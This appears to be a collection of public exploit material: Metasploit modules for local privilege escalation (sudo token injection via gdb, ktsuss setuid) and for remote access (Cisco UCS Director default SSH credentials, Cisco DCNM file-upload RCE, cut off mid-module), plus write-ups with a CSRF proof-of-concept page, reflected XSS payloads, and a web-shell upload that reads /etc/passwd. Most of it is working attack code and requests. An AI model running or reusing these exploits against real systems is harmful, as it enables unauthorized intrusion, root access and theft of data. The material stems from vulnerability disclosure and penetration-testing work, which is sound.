[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true,
'WfsDelay' => 30
},
'DefaultTarget' => 0))
register_options [
OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def timeout
datastore['TIMEOUT']
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def check
if yama_enabled?
vprint_error 'YAMA ptrace scope is restrictive'
return CheckCode::Safe
end
vprint_good 'YAMA ptrace scope is not restrictive'
if command_exists? '/usr/sbin/getsebool'
if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
vprint_error 'SELinux deny_ptrace is enabled'
return CheckCode::Safe
end
vprint_good 'SELinux deny_ptrace is disabled'
end
unless command_exists? 'sudo'
vprint_error 'sudo is not installed'
return CheckCode::Safe
end
vprint_good 'sudo is installed'
unless command_exists? 'gdb'
vprint_error 'gdb is not installed'
return CheckCode::Safe
end
vprint_good 'gdb is installed'
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
# Find running shell processes
shells = %w[ash ksh csh dash bash zsh tcsh fish sh]
system_shells = read_file('/etc/shells').to_s.each_line.map {|line|
line.strip
}.reject {|line|
line.starts_with?('#')
}.each {|line|
shells << line.split('/').last
}
shells = shells.uniq.reject {|shell| shell.blank?}
print_status 'Searching for shell processes ...'
pids = []
if command_exists? 'pgrep'
cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
pids << pid.strip
end
else
shells.each do |s|
pidof(s).each {|p| pids << p.strip}
end
end
if pids.empty?
fail_with Failure::Unknown, 'Found no running shell processes'
end
print_status "Found #{pids.uniq.length} running shell processes"
vprint_status pids.join(', ')
# Upload payload
@payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
upload @payload_path, generate_payload_exe
# Blindly call system() in each shell process
pids.each do |pid|
print_status "Injecting into process #{pid} ..."
cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"
sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
res = cmd_exec sudo_inject, nil, timeout
vprint_line res unless res.blank?
next unless setuid? @payload_path
print_good "#{@payload_path} setuid root successfully"
print_status 'Executing payload...'
res = cmd_exec "#{@payload_path} & echo "
vprint_line res
return
end
fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
end
def on_new_session(session)
if session.type.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.fs.file.rm @payload_path
else
session.shell_command_token "rm -f '#{@payload_path}'"
end
ensure
super
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ktsuss suid Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by exploiting
a vulnerability in ktsuss versions 1.4 and prior.
The ktsuss executable is setuid root and does not drop
privileges prior to executing user specified commands,
resulting in command execution with root privileges.
This module has been tested successfully on:
ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'John Lightsey', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2011-08-13',
'References' =>
[
['CVE', '2011-2921'],
['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
['URL', 'https://security.gentoo.org/glsa/201201-15'],
['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
],
'Platform' => ['linux'],
'Arch' =>
[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'AppendExit' => true,
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependSetreuid' => true,
'PrependSetuid' => true,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def ktsuss_path
datastore['KTSUSS_PATH']
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def check
unless setuid? ktsuss_path
vprint_error "#{ktsuss_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{ktsuss_path} is setuid"
id = cmd_exec 'whoami'
res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
vprint_status res
unless res.include? 'uid=0'
return CheckCode::Safe
end
CheckCode::Vulnerable
end
def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_name = ".#{rand_text_alphanumeric 10..15}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Executing payload ...'
id = cmd_exec 'whoami'
res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
vprint_line res
end
end
# Exploit Title : CraftCms Users information disclosure From uploaded File
# Author [Discovered By] : Mohammed Abdul Raheem
# Author's [Company Name] : TrekShield IT Solution
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
# Found Vulnerability On : 20-07-2019
# Vendor Homepage:https://craftcms.com/
# Software Information Link: https://github.com/craftcms/demo
# Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCmsv3 before 3.2.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : Sensitive information disclosure
# CVE : CVE-2019-14280
####################################################################
# Description about Software :
***************************
Craft is a flexible, user-friendly CMS for creating custom digital
experiences on the web and beyond.
####################################################################
# Vulnerability Description :
*****************************
When a user uploads an image in CraftCMS, the uploaded image's EXIF
Geolocation Data does not gets stripped. As a result, anyone can get
sensitive information of CraftCMS's users like their Geolocation,
their Device information like Device Name, Version, Software &
Software version used etc.
# Impact :
***********
This vulnerability is CRITICAL and impacts all the craft's customer
base. This vulnerability violates the privacy of a User and shares
sensitive information of the user who uploads an image on CraftCMS.
# Steps To Validate :
*********************
1. Login to CraftCMS account.
2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets
3. Upload an image which has EXIF Geolocation Data in it.
4. Once the image is uploaded by CraftCMS and hosted on the server,
download the image file and check the File Properties. You can also
use a tool like to view user's information: https://www.pic2map.com
# ATTACHED POC :
****************
https://youtu.be/s-fTdu8R3bU
# More Information Can be find here :
*************************************
https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23
###################################################################
# Discovered By Mohammed Abdul Raheem from TrekShield.com
Hello,
Please find the below vulnerability details,
---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery
(CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0)
# CVE : CVE-2019-10253
This is an article with PoC exploit code for for Wolters Kluwer TeamMate+ –
Cross-Site Request Forgery (CSRF) vulnerability
---------------------------------------------------------------------------------------------------------------------------------
Title:
====
Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability
CVE:
====
CVE-2019-10253
Date:
====
02/09/2019 (dd/mm/yyyy)
Vendor:
======
Wolters Kluwer is a global leader in professional information, software
solutions, and services for the health, tax & accounting, finance, risk &
compliance, and legal sectors. We help our customers make critical
decisions every day by providing expert solutions that combine deep domain
knowledge with specialized technology and services.
Vendor link: http://www.teammatesolutions.com/about-us.aspx
Vulnerable Product:
==============
TeamMate+
TeamMate Global Audit Solutions, part of the Tax and Accounting Division of
Wolters Kluwer, helps professionals in all industries at organizations
around the world manage audit and compliance risks and business issues by
providing targeted, configurable, and efficient software solutions.
Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate
Analytics. Together, this ecosystem of solutions provides organizations
with the combined assurance they need to manage all aspects of risk
identification and assessment, electronic working paper creation and
management, controls framework management, and data analysis.
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an
attacker to upload malicious/forged files on TeamMate server or replace
existing uploaded files with malicious/forged files by enticing
authenticated user to visit attacker page.
Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2
Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)
Exploitation-Technique:
=======================
Remote
Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE ID:
=======
CVE-2019-10253
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in
TeamMate+ which allows a remote attacker to modify application data (upload
malicious/forged files on TeamMate server or replace existing uploaded
files with malicious/forged files) without victim's knowledge by enticing
authenticated user to visit attacker page/URL.
The specific flaw exists within the handling of request to
“DomainObjectDocumentUpload.ashx” application. An application failed to
validate CSRF token before handling the POST request.
Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx
PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body onload="submitRequest()">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx",
true);
xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
"\r\n" +
"0\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"parentId\"\r\n" +
"\r\n" +
"1373\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
"\r\n" +
"34\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
"\r\n" +
"1106\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
"\r\n" +
"50\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data;
name=\"DocumentParentObjectType\"\r\n" +
"\r\n" +
"90\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"files[]\";
filename=\"Report.txt\"\r\n" +
"Content-Type: application/x-msdownload\r\n" +
"\r\n" +
"MZP\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
----------------------------------------------------------------------------
Credits:
=======
Bhadresh Patel
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Cisco UCS Director default scpuser password",
'Description' => %q{
This module abuses a known default password on Cisco UCS Director. The 'scpuser'
has the password of 'scpuser', and allows an attacker to login to the virtual appliance
via SSH.
This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
Note that Cisco also mentions in their advisory that their IMC Supervisor and
UCS Director Express are also affected by these vulnerabilities, but this module
was not tested with those products.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2019-1935' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Cisco UCS Director < 6.7.2.0', {} ],
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 21 2019'
))
register_options(
[
Opt::RPORT(22),
OptString.new('USERNAME', [true, "Username to login with", 'scpuser']),
OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']),
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user, pass)
factory = ssh_socket_factory
opts = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => rport,
:use_agent => false,
:config => false,
:password => pass,
:proxy => factory,
:non_interactive => true,
:verify_host_key => :never
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end
return nil
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
conn = do_login(user, pass)
if conn
print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
handler(conn.lsock)
end
end
end
* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE:CVE-2019-15889
Description
--
In the pro features of the WordPress download manager plugin, there is
a Category Short-code feature witch can use to sort categories with
order by a function which will be used as ?orderby=title,publish_date
.
By adding parameter "> and add any XSS payload , the xss payload will execute.
To reproduce,
1.Go to the link where we can find ?orderby
2.Add parameters >” and give simple payload like <script>alert(1)</script>
3.The payload will execute.
--
PoC
--
<div class="btn-group btn-group-sm pull-right"><button type="button"
class="btn btn-primary" disabled="disabled">Order </button><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--
Another reflected cross-site scripting via advance search
https://server/wpdmpro/advanced-search/
https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload
# Author: Cakes
# Discovery Date: 2019-09-03
# Vendor Homepage: www.solitude.dk/filethingie
# Software Link: https://github.com/leefish/filethingie/archive/master.zip
# Tested Version: 2.5.7
# Tested on OS: CentOS 7
# CVE: N/A
# Intro:
# Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives
::::: POST .zip file with cmd shell
POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034
Content-Length: 1117
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile-1567531192592"; filename=""
Content-Type: application/octet-stream
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip"
Content-Type: application/zip
PK š#O $ cmdshell.phpUT
۟n]۟n]۟n]ux ³±/È(P(ÃŽHÃɉOÂHMÖP‰ww
‰VOÃŽMQÂÕ´VP°·ã PKý(tÃ…& $ PK š#Oý(tÃ…& $ ¤ cmdshell.phpUT
۟n]۟n]۟n]ux PK Z €
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="act"
upload
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="dir"
/tester
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="submit"
Upload
-----------------------------3402520321248020588131184034--
:::::::::::::::::::::::::::::Unzip Malicious file
POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip
::::::::::::::::::::::::::::::Access your shell
GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0
::::::::::::::::::::::::::::::Read /etc/passwd
GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
HTTP/1.1 200 OK
Date: Tue, 03 Sep 2019 17:38:04 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1738
Connection: close
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
misdn:x:31:31:Modular ISDN:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:1000:1000::/home/spamfilter:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
cakes:x:1001:1001:cakes:/home/cakes:/bin/bash
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
'Description' => %q{
DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
directory and achieve remote code execution as root.
This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
directory for the WAR file upload.
This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
(see References to understand why).
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-1619' ], # auth bypass
[ 'CVE', '2019-1620' ], # file upload
[ 'CVE', '2019-1622' ], # log download
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Automatic', {} ],
[
'Cisco DCNM 11.1(1)', {}
],
[
'Cisco DCNM 11.0(1)', {}
],
[
'Cisco DCNM 10.4(2)', {}
]
],
'Privileged' => true,
'DefaultOptions' => { 'WfsDelay' => 10 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 26 2019'
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Connect with TLS', true]),
OptString.new('TARGETURI', [true, "Default server path", '/']),
OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above", 'admin']),
